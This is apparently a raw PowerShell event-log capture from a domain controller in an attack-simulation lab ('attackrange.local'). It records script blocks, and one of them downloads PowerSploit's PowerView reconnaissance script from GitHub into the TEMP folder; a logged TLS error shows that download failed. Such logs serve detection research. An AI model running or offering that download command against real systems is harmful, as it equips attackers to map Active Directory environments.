Message=Started invocation of ScriptBlock ID: 402c4d2e-7fbd-4381-8aa6-ef8c7db46cca
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478689
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: 402c4d2e-7fbd-4381-8aa6-ef8c7db46cca
Path:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478688
Keywords=None
Message=Completed invocation of ScriptBlock ID: 61f2483a-795e-47ba-8f6a-f2996809c7b3
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478687
Keywords=None
Message=Completed invocation of ScriptBlock ID: 81b002aa-31a9-4dce-9b22-d403e2e6915e
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478686
Keywords=None
Message=Completed invocation of ScriptBlock ID: 83d82015-e544-42e9-9c08-fc138ffb63b1
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478685
Keywords=None
Message=Started invocation of ScriptBlock ID: 83d82015-e544-42e9-9c08-fc138ffb63b1
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478684
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }

ScriptBlock ID: 83d82015-e544-42e9-9c08-fc138ffb63b1
Path:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478683
Keywords=None
Message=Started invocation of ScriptBlock ID: 81b002aa-31a9-4dce-9b22-d403e2e6915e
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478682
Keywords=None
Message=Started invocation of ScriptBlock ID: 61f2483a-795e-47ba-8f6a-f2996809c7b3
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478681
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: 61f2483a-795e-47ba-8f6a-f2996809c7b3
Path:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478680
Keywords=None
Message=Started invocation of ScriptBlock ID: fa1fa817-32fa-421f-9425-755a4634f1f5
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478679
Keywords=None
Message=Completed invocation of ScriptBlock ID: fe2536ba-2043-4365-9844-3564e3acf90f
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478678
Keywords=None
Message=Started invocation of ScriptBlock ID: fe2536ba-2043-4365-9844-3564e3acf90f
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4100
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Executing Pipeline
OpCode=To be used when an exception is raised
RecordNumber=1478677
Keywords=None
Message=Error Message = The request was aborted: Could not create SSL/TLS secure channel.
Fully Qualified Error ID = WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand


Context:
        Severity = Warning
        Host Name = ConsoleHost
        Host Version = 5.1.14393.4402
        Host ID = b1e6e791-c36d-4ed6-a28f-4c2a9102ba88
        Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe & {Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1"}
        Engine Version = 5.1.14393.4402
        Runspace ID = deee7381-0f36-40ce-8695-b013c581f049
        Pipeline ID = 1
        Command Name = Invoke-WebRequest
        Command Type = Cmdlet
        Script Name = 
        Command Path = 
        Sequence Number = 15
        User = ATTACKRANGE\administrator
        Connected User = 
        Shell ID = Microsoft.PowerShell


User Data:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478676
Keywords=None
Message=Completed invocation of ScriptBlock ID: 15de2fcb-33ca-4d75-8a80-3a85f2380887
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478675
Keywords=None
Message=Started invocation of ScriptBlock ID: 15de2fcb-33ca-4d75-8a80-3a85f2380887
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478674
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8159c94-195b-4aaa-a73a-e41e38f566b9
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478673
Keywords=None
Message=Started invocation of ScriptBlock ID: d8159c94-195b-4aaa-a73a-e41e38f566b9
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478672
Keywords=None
Message=Started invocation of ScriptBlock ID: 0153528c-291e-46d1-9c23-eca4b32e1527
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478671
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1"}

ScriptBlock ID: 0153528c-291e-46d1-9c23-eca4b32e1527
Path:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478670
Keywords=None
Message=Started invocation of ScriptBlock ID: f2f0af6f-bba5-4e15-9964-83ebb492ddea
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478669
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1"}

ScriptBlock ID: f2f0af6f-bba5-4e15-9964-83ebb492ddea
Path:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1478668
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1478667
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 5920 in AppDomain: DefaultAppDomain.
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1478666
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478665
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478664
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478663
Keywords=None
Message=Completed invocation of ScriptBlock ID: cd9fc933-7589-4630-8745-10c421a875c0
Runspace ID: e9801425-3304-44a1-ab83-d1399d88c692
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478662
Keywords=None
Message=Completed invocation of ScriptBlock ID: 66a0ffc4-4d98-4bf9-b237-4ce991f96dfa
Runspace ID: e9801425-3304-44a1-ab83-d1399d88c692
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478661
Keywords=None
Message=Completed invocation of ScriptBlock ID: 175d3cc1-eb11-42e2-906d-57e04bd9677a
Runspace ID: e9801425-3304-44a1-ab83-d1399d88c692
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478660
Keywords=None
Message=Started invocation of ScriptBlock ID: 175d3cc1-eb11-42e2-906d-57e04bd9677a
Runspace ID: e9801425-3304-44a1-ab83-d1399d88c692
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478659
Keywords=None
Message=Started invocation of ScriptBlock ID: 66a0ffc4-4d98-4bf9-b237-4ce991f96dfa
Runspace ID: e9801425-3304-44a1-ab83-d1399d88c692
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478658
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}}

ScriptBlock ID: 66a0ffc4-4d98-4bf9-b237-4ce991f96dfa
Path:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478657
Keywords=None
Message=Started invocation of ScriptBlock ID: cd9fc933-7589-4630-8745-10c421a875c0
Runspace ID: e9801425-3304-44a1-ab83-d1399d88c692
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478656
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}}

ScriptBlock ID: cd9fc933-7589-4630-8745-10c421a875c0
Path:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1478655
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1478654
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 8148 in AppDomain: DefaultAppDomain.
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1478653
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478652
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478651
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478650
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478649
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478648
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478647
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478646
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478645
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478644
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478643
Keywords=None
Message=Completed invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478642
Keywords=None
Message=Started invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478641
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478640
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478639
Keywords=None
Message=Completed invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478638
Keywords=None
Message=Completed invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478637
Keywords=None
Message=Started invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478636
Keywords=None
